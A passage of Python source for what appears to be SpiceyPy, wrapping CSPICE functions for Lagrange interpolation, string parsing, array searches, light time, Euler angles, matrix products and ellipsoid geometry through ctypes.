                      rolstp, ncuts, schstp, soltol,
                      maxn, npts, points, epochs, tangts)
    # Clip the empty elements out of returned results
    npts = stypes.cVectorToPython(npts)
    # Keep only the cuts for which CSPICE actually found limb points.
    valid_points = numpy.where(npts >= 1)
    return npts[valid_points], stypes.cMatrixToNumpy(points)[valid_points], stypes.cVectorToPython(epochs)[valid_points], stypes.cMatrixToNumpy(tangts)[valid_points]
@spiceErrorCheck
def lgrind(xvals, yvals, x):
    """
    Evaluate a Lagrange interpolating polynomial for a specified
    set of coordinate pairs, at a specified abscissa value.
    Return the value of both polynomial and derivative.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lgrind_c.html
    :param xvals: Abscissa values.
    :type xvals: N-Element Array of floats
    :param yvals: Ordinate values.
    :type yvals: N-Element Array of floats
    :param x: Point at which to interpolate the polynomial.
    :type x: float
    :return: Polynomial value at x, Polynomial derivative at x.
    :rtype: tuple
    """
    # Point count must be taken before xvals is converted to a C array.
    n = ctypes.c_int(len(xvals))
    xvals = stypes.toDoubleVector(xvals)
    yvals = stypes.toDoubleVector(yvals)
    # CSPICE requires a work space of at least 2*n doubles.
    work = stypes.emptyDoubleVector(n.value*2)
    x = ctypes.c_double(x)
    p = ctypes.c_double(0)
    dp = ctypes.c_double(0)
    # NOTE(review): p and dp are output doubles passed without byref();
    # this presumably relies on ctypes auto-converting c_double instances
    # to pointers via libspice's declared argtypes — confirm.
    libspice.lgrind_c(n, xvals, yvals, work, x, p, dp)
    return p.value, dp.value
@spiceErrorCheck
def lmpool(cvals):
    """
    Load the variables contained in an internal buffer into the
    kernel pool.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lmpool_c.html
    :param cvals: list of strings.
    :type cvals: list of str
    """
    # Row width = longest entry + 1 for the terminating NUL.
    lenvals = ctypes.c_int(len(max(cvals, key=len)) + 1)
    n = ctypes.c_int(len(cvals))
    cvals = stypes.listToCharArrayPtr(cvals, xLen=lenvals, yLen=n)
    libspice.lmpool_c(cvals, lenvals, n)
@spiceErrorCheck
def lparse(inlist, delim, nmax):
    """
    Parse a list of items delimited by a single character.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lparse_c.html
    :param inlist: list of items delimited by delim.
    :type inlist: list
    :param delim: Single character used to delimit items.
    :type delim: str
    :param nmax: Maximum number of items to return.
    :type nmax: int
    :return: Items in the list, left justified.
    :rtype: list of str
    """
    delim = stypes.stringToCharP(delim)
    # Item buffer width is bounded by the whole input string's length;
    # it must be computed before inlist is converted to a char pointer.
    lenout = ctypes.c_int(len(inlist))
    inlist = stypes.stringToCharP(inlist)
    nmax = ctypes.c_int(nmax)
    items = stypes.emptyCharArray(lenout, nmax)
    n = ctypes.c_int()
    libspice.lparse_c(inlist, delim, nmax, lenout, ctypes.byref(n),
                      ctypes.byref(items))
    # Only the first n entries were populated by CSPICE.
    return [stypes.toPythonString(x.value) for x in items[0:n.value]]
@spiceErrorCheck
def lparsm(inlist, delims, nmax, lenout=None):
    """
    Parse a list of items separated by multiple delimiters.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lparsm_c.html
    :param inlist: list of items delimited by delims.
    :type inlist: list of strings
    :param delims: Single characters which delimit items.
    :type delims: str
    :param nmax: Maximum number of items to return.
    :type nmax: int
    :param lenout: Optional Length of strings in item array.
    :type lenout: int
    :return: Items in the list, left justified.
    :rtype: list of strings
    """
    if lenout is None:
        # Default item width: whole input length + 1, which bounds the
        # longest possible single item plus its NUL terminator.
        lenout = ctypes.c_int(len(inlist) + 1)
    else:
        lenout = ctypes.c_int(lenout)
    inlist = stypes.stringToCharP(inlist)
    delims = stypes.stringToCharP(delims)
    items = stypes.emptyCharArray(lenout.value, nmax)
    nmax = ctypes.c_int(nmax)
    n = ctypes.c_int()
    libspice.lparsm_c(inlist, delims, nmax, lenout, ctypes.byref(n), items)
    # Only the first n entries were populated by CSPICE.
    return [stypes.toPythonString(x.value) for x in items][0:n.value]
@spiceErrorCheck
def lparss(inlist, delims, NMAX=20, LENGTH=50):
    """
    Parse a list of items separated by multiple delimiters, placing the
    resulting items into a set.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lparss_c.html
    :param inlist: list of items delimited by delims.
    :type inlist: str
    :param delims: Single characters which delimit items.
    :type delims: str
    :param NMAX: Optional nmax of spice set.
    :type NMAX: int
    :param LENGTH: Optional length of strings in spice set
    :type LENGTH: int
    :return: Set containing items in the list, left justified.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    inlist = stypes.stringToCharP(inlist)
    delims = stypes.stringToCharP(delims)
    # Output is a SPICE character cell sized by the caller's bounds.
    returnSet = stypes.SPICECHAR_CELL(NMAX, LENGTH)
    libspice.lparss_c(inlist, delims, ctypes.byref(returnSet))
    return returnSet
@spiceErrorCheck
def lspcn(body, et, abcorr):
    """
    Compute L_s, the planetocentric longitude of the sun, as seen
    from a specified body.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lspcn_c.html
    :param body: Name of central body.
    :type body: str
    :param et: Epoch in seconds past J2000 TDB.
    :type et: float
    :param abcorr: Aberration correction.
    :type abcorr: str
    :return: planetocentric longitude of the sun
    :rtype: float
    """
    body = stypes.stringToCharP(body)
    et = ctypes.c_double(et)
    abcorr = stypes.stringToCharP(abcorr)
    # Result (radians) is returned directly by the CSPICE function.
    return libspice.lspcn_c(body, et, abcorr)
@spiceErrorCheck
def lstlec(string, n, lenvals, array):
    """
    Given a character string and an ordered array of character
    strings, find the index of the largest array element less than
    or equal to the given string.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstlec_c.html
    :param string: Upper bound value to search against.
    :type string: str
    :param n: Number elements in array.
    :type n: int
    :param lenvals: String length.
    :type lenvals: int
    :param array: Array of possible lower bounds.
    :type array: list
    :return:
            index of the last element of array that is
            lexically less than or equal to string.
    :rtype: int
    """
    string = stypes.stringToCharP(string)
    # NOTE: the array must be built while n/lenvals are plain Python ints;
    # only afterwards are they wrapped in c_int.
    array = stypes.listToCharArrayPtr(array, xLen=lenvals, yLen=n)
    n = ctypes.c_int(n)
    lenvals = ctypes.c_int(lenvals)
    return libspice.lstlec_c(string, n, lenvals, array)
@spiceErrorCheck
def lstled(x, n, array):
    """
    Given a number x and an array of non-decreasing floats
    find the index of the largest array element less than or equal to x.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstled_c.html
    :param x: Value to search against.
    :type x: float
    :param n: Number elements in array.
    :type n: int
    :param array: Array of possible lower bounds
    :type array: list
    :return: index of the last element of array that is less than or equal to x.
    :rtype: int
    """
    # Straight marshalling; the index result is returned directly.
    array = stypes.toDoubleVector(array)
    x = ctypes.c_double(x)
    n = ctypes.c_int(n)
    return libspice.lstled_c(x, n, array)
@spiceErrorCheck
def lstlei(x, n, array):
    """
    Given a number x and an array of non-decreasing ints,
    find the index of the largest array element less than or equal to x.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstlei_c.html
    :param x: Value to search against.
    :type x: int
    :param n: Number elements in array.
    :type n: int
    :param array: Array of possible lower bounds
    :type array: list
    :return: index of the last element of array that is less than or equal to x.
    :rtype: int
    """
    # Integer twin of lstled: same marshalling, int flavored.
    array = stypes.toIntVector(array)
    x = ctypes.c_int(x)
    n = ctypes.c_int(n)
    return libspice.lstlei_c(x, n, array)
@spiceErrorCheck
def lstltc(string, n, lenvals, array):
    """
    Given a character string and an ordered array of character
    strings, find the index of the largest array element less than
    the given string.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstltc_c.html
    :param string: Upper bound value to search against.
    :type string: str
    :param n: Number elements in array.
    :type n: int
    :param lenvals: String length.
    :type lenvals: int
    :param array: Array of possible lower bounds
    :type array: list
    :return:
            index of the last element of array that
            is lexically less than string.
    :rtype: int
    """
    string = stypes.stringToCharP(string)
    # NOTE: the array must be built while n/lenvals are plain Python ints;
    # only afterwards are they wrapped in c_int.
    array = stypes.listToCharArrayPtr(array, xLen=lenvals, yLen=n)
    n = ctypes.c_int(n)
    lenvals = ctypes.c_int(lenvals)
    return libspice.lstltc_c(string, n, lenvals, array)
@spiceErrorCheck
def lstltd(x, n, array):
    """
    Given a number x and an array of non-decreasing floats
    find the index of the largest array element less than x.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstltd_c.html
    :param x: Value to search against
    :type x: float
    :param n: Number elements in array
    :type n: int
    :param array: Array of possible lower bounds
    :type array: list
    :return: index of the last element of array that is less than x.
    :rtype: int
    """
    # Strict-less-than counterpart of lstled; same marshalling.
    array = stypes.toDoubleVector(array)
    x = ctypes.c_double(x)
    n = ctypes.c_int(n)
    return libspice.lstltd_c(x, n, array)
@spiceErrorCheck
def lstlti(x, n, array):
    """
    Given a number x and an array of non-decreasing int,
    find the index of the largest array element less than x.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstlti_c.html
    :param x: Value to search against
    :type x: int
    :param n: Number elements in array
    :type n: int
    :param array: Array of possible lower bounds
    :type array: list
    :return: index of the last element of array that is less than x.
    :rtype: int
    """
    # Strict-less-than counterpart of lstlei; same marshalling.
    array = stypes.toIntVector(array)
    x = ctypes.c_int(x)
    n = ctypes.c_int(n)
    return libspice.lstlti_c(x, n, array)
@spiceErrorCheck
def ltime(etobs, obs, direct, targ):
    """
    This routine computes the transmit (or receive) time
    of a signal at a specified target, given the receive
    (or transmit) time at a specified observer. The elapsed
    time between transmit and receive is also returned.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ltime_c.html
    :param etobs: Epoch of a signal at some observer
    :type etobs: float
    :param obs: NAIF ID of some observer
    :type obs: int
    :param direct: Direction the signal travels ( "->" or "<-" )
    :type direct: str
    :param targ: NAIF ID of the target object
    :type targ: int
    :return: epoch and time
    :rtype: tuple
    """
    etobs = ctypes.c_double(etobs)
    obs = ctypes.c_int(obs)
    direct = stypes.stringToCharP(direct)
    targ = ctypes.c_int(targ)
    # Two scalar outputs: epoch at target and elapsed light time.
    ettarg = ctypes.c_double()
    elapsd = ctypes.c_double()
    libspice.ltime_c(etobs, obs, direct, targ, ctypes.byref(ettarg),
                     ctypes.byref(elapsd))
    return ettarg.value, elapsd.value
@spiceErrorCheck
def lx4dec(string, first):
    """
    Scan a string from a specified starting position for the
    end of a decimal number.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lx4dec_c.html
    :param string: Any character string.
    :type string: str
    :param first: First character to scan from in string.
    :type first: int
    :return: last and nchar
    :rtype: tuple
    """
    string = stypes.stringToCharP(string)
    first = ctypes.c_int(first)
    # Outputs: index of last char of the token and its character count.
    last = ctypes.c_int()
    nchar = ctypes.c_int()
    libspice.lx4dec_c(string, first, ctypes.byref(last), ctypes.byref(nchar))
    return last.value, nchar.value
@spiceErrorCheck
def lx4num(string, first):
    """
    Scan a string from a specified starting position for the
    end of a number.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lx4num_c.html
    :param string: Any character string.
    :type string: str
    :param first: First character to scan from in string.
    :type first: int
    :return: last and nchar
    :rtype: tuple
    """
    string = stypes.stringToCharP(string)
    first = ctypes.c_int(first)
    # Outputs: index of last char of the token and its character count.
    last = ctypes.c_int()
    nchar = ctypes.c_int()
    libspice.lx4num_c(string, first, ctypes.byref(last), ctypes.byref(nchar))
    return last.value, nchar.value
@spiceErrorCheck
def lx4sgn(string, first):
    """
    Scan a string from a specified starting position for the
    end of a signed integer.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lx4sgn_c.html
    :param string: Any character string.
    :type string: str
    :param first: First character to scan from in string.
    :type first: int
    :return: last and nchar
    :rtype: tuple
    """
    string = stypes.stringToCharP(string)
    first = ctypes.c_int(first)
    # Outputs: index of last char of the token and its character count.
    last = ctypes.c_int()
    nchar = ctypes.c_int()
    libspice.lx4sgn_c(string, first, ctypes.byref(last), ctypes.byref(nchar))
    return last.value, nchar.value
@spiceErrorCheck
def lx4uns(string, first):
    """
    Scan a string from a specified starting position for the
    end of an unsigned integer.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lx4uns_c.html
    :param string: Any character string.
    :type string: str
    :param first: First character to scan from in string.
    :type first: int
    :return: last and nchar
    :rtype: tuple
    """
    string = stypes.stringToCharP(string)
    first = ctypes.c_int(first)
    # Outputs: index of last char of the token and its character count.
    last = ctypes.c_int()
    nchar = ctypes.c_int()
    libspice.lx4uns_c(string, first, ctypes.byref(last), ctypes.byref(nchar))
    return last.value, nchar.value
@spiceErrorCheck
def lxqstr(string, qchar, first):
    """
    Lex (scan) a quoted string.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lxqstr_c.html
    :param string: String to be scanned.
    :type string: str
    :param qchar: Quote delimiter character.
    :type qchar: char (string of one char)
    :param first: Character position at which to start scanning.
    :type first: int
    :return: last and nchar
    :rtype: tuple
    """
    string = stypes.stringToCharP(string)
    # Single character: encode to one byte for ctypes.c_char.
    qchar = ctypes.c_char(qchar.encode(encoding='UTF-8'))
    first = ctypes.c_int(first)
    last = ctypes.c_int()
    nchar = ctypes.c_int()
    libspice.lxqstr_c(string, qchar, first, ctypes.byref(last),
                      ctypes.byref(nchar))
    return last.value, nchar.value
################################################################################
# M
@spiceErrorCheck
def m2eul(r, axis3, axis2, axis1):
    """
    Factor a rotation matrix as a product of three rotations
    about specified coordinate axes.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/m2eul_c.html
    :param r: A rotation matrix to be factored
    :type r: 3x3-Element Array of floats
    :param axis3: third rotation axes.
    :type axis3: int
    :param axis2: second rotation axes.
    :type axis2: int
    :param axis1: first rotation axes.
    :type axis1: int
    :return: Third, second, and first Euler angles, in radians.
    :rtype: tuple
    """
    r = stypes.toDoubleMatrix(r)
    axis3 = ctypes.c_int(axis3)
    axis2 = ctypes.c_int(axis2)
    axis1 = ctypes.c_int(axis1)
    # Three scalar angle outputs, returned in (angle3, angle2, angle1)
    # order to match the CSPICE signature.
    angle3 = ctypes.c_double()
    angle2 = ctypes.c_double()
    angle1 = ctypes.c_double()
    libspice.m2eul_c(r, axis3, axis2, axis1, ctypes.byref(angle3),
                     ctypes.byref(angle2), ctypes.byref(angle1))
    return angle3.value, angle2.value, angle1.value
@spiceErrorCheck
def m2q(r):
    """
    Find a unit quaternion corresponding to a specified rotation matrix.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/m2q_c.html
    :param r: A rotation matrix to be factored
    :type r: 3x3-Element Array of floats
    :return: A unit quaternion representing the rotation matrix
    :rtype: 4-Element Array of floats
    """
    r = stypes.toDoubleMatrix(r)
    # CSPICE fills the 4-vector quaternion output buffer in place.
    q = stypes.emptyDoubleVector(4)
    libspice.m2q_c(r, q)
    return stypes.cVectorToPython(q)
@spiceErrorCheck
def matchi(string, templ, wstr, wchr):
    """
    Test whether a string matches a wildcard template, ignoring case.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/matchi_c.html

    :param string: String to be tested.
    :type string: str
    :param templ: Template (with wild cards) to test against string.
    :type templ: str
    :param wstr: Wild string token.
    :type wstr: str of length 1
    :param wchr: Wild character token.
    :type wchr: str of length 1
    :return: The function returns True if string matches templ, else False
    :rtype: bool
    """
    c_string = stypes.stringToCharP(string)
    c_templ = stypes.stringToCharP(templ)
    c_wstr = ctypes.c_char(wstr.encode(encoding='UTF-8'))
    c_wchr = ctypes.c_char(wchr.encode(encoding='UTF-8'))
    matched = libspice.matchi_c(c_string, c_templ, c_wstr, c_wchr)
    return bool(matched)
@spiceErrorCheck
def matchw(string, templ, wstr, wchr):
    """
    Test whether a string matches a wildcard template (case-sensitive).

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/matchw_c.html

    :param string: String to be tested.
    :type string: str
    :param templ: Template (with wild cards) to test against string.
    :type templ: str
    :param wstr: Wild string token.
    :type wstr: str of length 1
    :param wchr: Wild character token.
    :type wchr: str of length 1
    :return: The function returns True if string matches templ, else False
    :rtype: bool
    """
    c_string = stypes.stringToCharP(string)
    c_templ = stypes.stringToCharP(templ)
    c_wstr = ctypes.c_char(wstr.encode(encoding='UTF-8'))
    c_wchr = ctypes.c_char(wchr.encode(encoding='UTF-8'))
    matched = libspice.matchw_c(c_string, c_templ, c_wstr, c_wchr)
    return bool(matched)
# skiping for now maxd_c,
# odd as arguments must be parsed and not really important
# skiping for now maxi_c,
# odd as arguments must be parsed and not really important
@spiceErrorCheck
def mequ(m1):
    """
    Copy one double precision 3x3 matrix into another.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mequ_c.html

    :param m1: input matrix.
    :type m1: 3x3-Element Array of floats
    :return: Output matrix equal to m1.
    :rtype: 3x3-Element Array of floats
    """
    mout = stypes.emptyDoubleMatrix()
    libspice.mequ_c(stypes.toDoubleMatrix(m1), mout)
    return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def mequg(m1, nr, nc):
    """
    Set one double precision matrix of arbitrary size equal to another.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mequg_c.html

    :param m1: Input matrix.
    :type m1: NxM-Element Array of floats
    :param nr: Row dimension of m1.
    :type nr: int
    :param nc: Column dimension of m1.
    :type nc: int
    :return: Output matrix equal to m1
    :rtype: NxM-Element Array of floats
    """
    m1 = stypes.toDoubleMatrix(m1)
    mout = stypes.emptyDoubleMatrix(x=nc, y=nr)
    nr = ctypes.c_int(nr)
    nc = ctypes.c_int(nc)
    # The CSPICE prototype is mequg_c(m1, nr, nc, mout): the row
    # dimension precedes the column dimension. (The previous call passed
    # nc before nr; harmless for the element copy since nr*nc is the
    # same either way, but it did not match the documented interface.)
    libspice.mequg_c(m1, nr, nc, mout)
    return stypes.cMatrixToNumpy(mout)
# skiping for now mind_c,
# odd as arguments must be parsed and not really important
# skiping for now mini_c,
# odd as arguments must be parsed and not really important
@spiceErrorCheck
def mtxm(m1, m2):
    """
    Compute the product of the transpose of a 3x3 matrix with a 3x3 matrix.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mtxm_c.html

    :param m1: 3x3 double precision matrix.
    :type m1: 3x3-Element Array of floats
    :param m2: 3x3 double precision matrix.
    :type m2: 3x3-Element Array of floats
    :return: The produce m1 transpose times m2.
    :rtype: 3x3-Element Array of floats
    """
    product = stypes.emptyDoubleMatrix()
    libspice.mtxm_c(stypes.toDoubleMatrix(m1), stypes.toDoubleMatrix(m2),
                    product)
    return stypes.cMatrixToNumpy(product)
@spiceErrorCheck
def mtxmg(m1, m2, ncol1, nr1r2, ncol2):
    """
    Compute the product of the transpose of a matrix with another matrix,
    both of arbitrary size.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mtxmg_c.html

    :param m1: nr1r2 X ncol1 double precision matrix.
    :type m1: NxM-Element Array of floats
    :param m2: nr1r2 X ncol2 double precision matrix.
    :type m2: NxM-Element Array of floats
    :param ncol1: Column dimension of m1 and row dimension of mout.
    :type ncol1: int
    :param nr1r2: Row dimension of m1 and m2.
    :type nr1r2: int
    :param ncol2: Column dimension of m2.
    :type ncol2: int
    :return: Transpose of m1 times m2.
    :rtype: NxM-Element Array of floats
    """
    # Result has ncol1 rows and ncol2 columns.
    product = stypes.emptyDoubleMatrix(x=ncol2, y=ncol1)
    libspice.mtxmg_c(stypes.toDoubleMatrix(m1), stypes.toDoubleMatrix(m2),
                     ctypes.c_int(ncol1), ctypes.c_int(nr1r2),
                     ctypes.c_int(ncol2), product)
    return stypes.cMatrixToNumpy(product)
@spiceErrorCheck
def mtxv(m1, vin):
    """
    Apply the transpose of a 3x3 matrix to a 3-dimensional vector.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mtxv_c.html

    :param m1: 3x3 double precision matrix.
    :type m1: 3x3-Element Array of floats
    :param vin: 3-dimensional double precision vector.
    :type vin: 3-Element Array of floats
    :return: 3-dimensional double precision vector.
    :rtype: 3-Element Array of floats
    """
    result = stypes.emptyDoubleVector(3)
    libspice.mtxv_c(stypes.toDoubleMatrix(m1), stypes.toDoubleVector(vin),
                    result)
    return stypes.cVectorToPython(result)
@spiceErrorCheck
def mtxvg(m1, v2, ncol1, nr1r2):
    """
    Compute the product of the transpose of a matrix with a vector,
    both of arbitrary size.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mtxvg_c.html

    :param m1: Left-hand matrix to be multiplied.
    :type m1: NxM-Element Array of floats
    :param v2: Right-hand vector to be multiplied.
    :type v2: Array of floats
    :param ncol1: Column dimension of m1 and length of vout.
    :type ncol1: int
    :param nr1r2: Row dimension of m1 and length of v2.
    :type nr1r2: int
    :return: Product vector m1 transpose * v2.
    :rtype: Array of floats
    """
    result = stypes.emptyDoubleVector(ncol1)
    libspice.mtxvg_c(stypes.toDoubleMatrix(m1), stypes.toDoubleVector(v2),
                     ctypes.c_int(ncol1), ctypes.c_int(nr1r2), result)
    return stypes.cVectorToPython(result)
@spiceErrorCheck
def mxm(m1, m2):
    """
    Compute the product of two 3x3 matrices.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxm_c.html

    :param m1: 3x3 double precision matrix.
    :type m1: 3x3-Element Array of floats
    :param m2: 3x3 double precision matrix.
    :type m2: 3x3-Element Array of floats
    :return: 3x3 double precision matrix.
    :rtype: 3x3-Element Array of floats
    """
    product = stypes.emptyDoubleMatrix()
    libspice.mxm_c(stypes.toDoubleMatrix(m1), stypes.toDoubleMatrix(m2),
                   product)
    return stypes.cMatrixToNumpy(product)
@spiceErrorCheck
def mxmg(m1, m2, nrow1, ncol1, ncol2):
    """
    Compute the product of two double precision matrices of arbitrary size.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxmg_c.html

    :param m1: nrow1 X ncol1 double precision matrix.
    :type m1: NxM-Element Array of floats
    :param m2: ncol1 X ncol2 double precision matrix.
    :type m2: NxM-Element Array of floats
    :param nrow1: Row dimension of m1
    :type nrow1: int
    :param ncol1: Column dimension of m1 and row dimension of m2.
    :type ncol1: int
    :param ncol2: Column dimension of m2
    :type ncol2: int
    :return: nrow1 X ncol2 double precision matrix.
    :rtype: NxM-Element Array of floats
    """
    # Result has nrow1 rows and ncol2 columns.
    product = stypes.emptyDoubleMatrix(x=ncol2, y=nrow1)
    libspice.mxmg_c(stypes.toDoubleMatrix(m1), stypes.toDoubleMatrix(m2),
                    ctypes.c_int(nrow1), ctypes.c_int(ncol1),
                    ctypes.c_int(ncol2), product)
    return stypes.cMatrixToNumpy(product)
@spiceErrorCheck
def mxmt(m1, m2):
    """
    Compute the product of a 3x3 matrix with the transpose of another
    3x3 matrix.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxmt_c.html

    :param m1: 3x3 double precision matrix.
    :type m1: 3x3-Element Array of floats
    :param m2: 3x3 double precision matrix.
    :type m2: 3x3-Element Array of floats
    :return: The product m1 times m2 transpose.
    :rtype: 3x3-Element Array of floats
    """
    product = stypes.emptyDoubleMatrix()
    libspice.mxmt_c(stypes.toDoubleMatrix(m1), stypes.toDoubleMatrix(m2),
                    product)
    return stypes.cMatrixToNumpy(product)
@spiceErrorCheck
def mxmtg(m1, m2, nrow1, nc1c2, nrow2):
    """
    Compute the product of a matrix with the transpose of another matrix,
    both of arbitrary size.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxmtg_c.html

    :param m1: Left-hand matrix to be multiplied.
    :type m1: NxM-Element Array of floats
    :param m2: Right-hand matrix whose transpose is to be multiplied
    :type m2: NxM-Element Array of floats
    :param nrow1: Row dimension of m1 and row dimension of mout.
    :type nrow1: int
    :param nc1c2: Column dimension of m1 and column dimension of m2.
    :type nc1c2: int
    :param nrow2: Row dimension of m2 and column dimension of mout.
    :type nrow2: int
    :return: Product matrix.
    :rtype: NxM-Element Array of floats
    """
    # Result has nrow1 rows and nrow2 columns.
    product = stypes.emptyDoubleMatrix(x=nrow2, y=nrow1)
    libspice.mxmtg_c(stypes.toDoubleMatrix(m1), stypes.toDoubleMatrix(m2),
                     ctypes.c_int(nrow1), ctypes.c_int(nc1c2),
                     ctypes.c_int(nrow2), product)
    return stypes.cMatrixToNumpy(product)
@spiceErrorCheck
def mxv(m1, vin):
    """
    Apply a 3x3 double precision matrix to a 3-dimensional double
    precision vector.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxv_c.html

    :param m1: 3x3 double precision matrix.
    :type m1: 3x3-Element Array of floats
    :param vin: 3-dimensional double precision vector.
    :type vin: 3-Element Array of floats
    :return: 3-dimensional double precision vector.
    :rtype: 3-Element Array of floats
    """
    result = stypes.emptyDoubleVector(3)
    libspice.mxv_c(stypes.toDoubleMatrix(m1), stypes.toDoubleVector(vin),
                   result)
    return stypes.cVectorToPython(result)
@spiceErrorCheck
def mxvg(m1, v2, nrow1, nc1r2):
    """
    Compute the product of a matrix and a vector of arbitrary size.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/mxvg_c.html

    :param m1: Left-hand matrix to be multiplied.
    :type m1: NxM-Element Array of floats
    :param v2: Right-hand vector to be multiplied.
    :type v2: Array of floats
    :param nrow1: Row dimension of m1 and length of vout.
    :type nrow1: int
    :param nc1r2: Column dimension of m1 and length of v2.
    :type nc1r2: int
    :return: Product vector m1*v2
    :rtype: Array of floats
    """
    result = stypes.emptyDoubleVector(nrow1)
    libspice.mxvg_c(stypes.toDoubleMatrix(m1), stypes.toDoubleVector(v2),
                    ctypes.c_int(nrow1), ctypes.c_int(nc1r2), result)
    return stypes.cVectorToPython(result)
################################################################################
# N
@spiceErrorCheck
def namfrm(frname):
    """
    Look up the frame ID code associated with a string.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/namfrm_c.html

    :param frname: The name of some reference frame.
    :type frname: str
    :return: The SPICE ID code of the frame.
    :rtype: int
    """
    frcode = ctypes.c_int()
    libspice.namfrm_c(stypes.stringToCharP(frname), ctypes.byref(frcode))
    return frcode.value
@spiceErrorCheck
def ncpos(string, chars, start):
    """
    Find the first occurrence, searching forward from a specified
    location, of a character NOT belonging to a collection of characters.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ncpos_c.html

    :param string: Any character string.
    :type string: str
    :param chars: A collection of characters.
    :type chars: str
    :param start: Position to begin looking for one not in chars.
    :type start: int
    :return: index
    :rtype: int
    """
    return libspice.ncpos_c(stypes.stringToCharP(string),
                            stypes.stringToCharP(chars),
                            ctypes.c_int(start))
@spiceErrorCheck
def ncposr(string, chars, start):
    """
    Find the first occurrence, searching in reverse from a specified
    location, of a character NOT belonging to a collection of characters.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ncposr_c.html

    :param string: Any character string.
    :type string: str
    :param chars: A collection of characters.
    :type chars: str
    :param start: Position to begin looking for one of chars.
    :type start: int
    :return: index
    :rtype: int
    """
    return libspice.ncposr_c(stypes.stringToCharP(string),
                             stypes.stringToCharP(chars),
                             ctypes.c_int(start))
@spiceErrorCheck
def nearpt(positn, a, b, c):
    """
    Locate the point on the surface of an ellipsoid nearest to a given
    position, and return the altitude of that position above the
    ellipsoid.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/nearpt_c.html

    :param positn: Position of a point in bodyfixed frame.
    :type positn: 3-Element Array of floats
    :param a: Length of semi-axis parallel to x-axis.
    :type a: float
    :param b: Length of semi-axis parallel to y-axis.
    :type b: float
    :param c: Length on semi-axis parallel to z-axis.
    :type c: float
    :return:
            Point on the ellipsoid closest to positn,
            Altitude of positn above the ellipsoid.
    :rtype: tuple
    """
    npoint = stypes.emptyDoubleVector(3)
    alt = ctypes.c_double()
    libspice.nearpt_c(stypes.toDoubleVector(positn), ctypes.c_double(a),
                      ctypes.c_double(b), ctypes.c_double(c), npoint,
                      ctypes.byref(alt))
    return stypes.cVectorToPython(npoint), alt.value
@spiceErrorCheck
def npedln(a, b, c, linept, linedr):
    """
    Find the nearest point on a triaxial ellipsoid to a specified
    line and the distance from the ellipsoid to the line.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/npedln_c.html

    :param a: Length of ellipsoid's semi-axis in the x direction
    :type a: float
    :param b: Length of ellipsoid's semi-axis in the y direction
    :type b: float
    :param c: Length of ellipsoid's semi-axis in the z direction
    :type c: float
    :param linept: Point on the line.
    :type linept: 3-Element Array of floats
    :param linedr: Direction vector of line
    :type linedr: 3-Element Array of floats
    :return: Nearest point on ellipsoid to line, Distance of ellipsoid from line
    :rtype: tuple
    """
    pnear = stypes.emptyDoubleVector(3)
    dist = ctypes.c_double()
    libspice.npedln_c(ctypes.c_double(a), ctypes.c_double(b),
                      ctypes.c_double(c), stypes.toDoubleVector(linept),
                      stypes.toDoubleVector(linedr), pnear,
                      ctypes.byref(dist))
    return stypes.cVectorToPython(pnear), dist.value
@spiceErrorCheck
def npelpt(point, ellips):
    """
    Find the nearest point on an ellipse to a specified point, both
    in three-dimensional space, together with the distance between them.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/npelpt_c.html

    :param point: Point whose distance to an ellipse is to be found.
    :type point: 3-Element Array of floats
    :param ellips: An ellipse.
    :type ellips: spiceypy.utils.support_types.Ellipse
    :return: Nearest point on ellipsoid to line, Distance of ellipsoid from line
    :rtype: tuple
    """
    assert isinstance(ellips, stypes.Ellipse)
    pnear = stypes.emptyDoubleVector(3)
    dist = ctypes.c_double()
